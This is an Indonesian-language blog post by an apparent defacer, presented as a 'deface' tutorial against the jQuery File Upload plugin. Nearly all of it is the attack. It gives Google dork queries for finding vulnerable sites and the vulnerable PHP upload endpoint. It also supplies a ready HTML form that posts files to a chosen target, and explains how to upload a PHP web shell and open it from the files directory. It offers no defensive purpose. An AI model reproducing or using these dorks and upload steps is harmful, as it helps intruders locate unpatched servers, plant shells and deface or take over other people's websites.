ok semuanya kali ini 4./Lucif3r bakalan bagi tutor deface dengan POC jquery file upload
langsung saja siapkan alat tempurnya
langsung saja siapkan alat tempurnya
- Dork:
/assets/global/plugins/jquery-file-upload/
inurl:"assets/global/plugins/jquery-file-upload/"
intext:"assets/global/plugins/jquery-file-upload/"
inurl:"/assets/global/plugins/jquery-file-upload/server/php/files/"
(sisanya kembangin sendiri gunakan otak bokep lo)
2.ekploit:/assets/global/plugins/jquery-file-upload/server/php/
http://targetlo.co.uk/[patch]/assets/global/plugins/jquery-file-upload/server/php/
3.Csrf:
<form method="POST" action="http://www.target.com/assets/global/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
*tulisan merah diganti dengan target lo
*tanda jaka vuln ada tulisan: {"files":[]}
*Jika sudah di save dengan format html, silahkan buka filenya dengan browser yang anda gunakan lalu upload shellnya
*access shell
http://www.target.com/[patch]/assets/global/plugins/jquery-file-upload/server/php/files/namashell.php
Sekian yang bisa saya bagikan jika kurang jelas bisa tanya sanya melalui facebook.com/4lucif3r
0 Response to "Deface dengan POC jquery file upload "
Post a Comment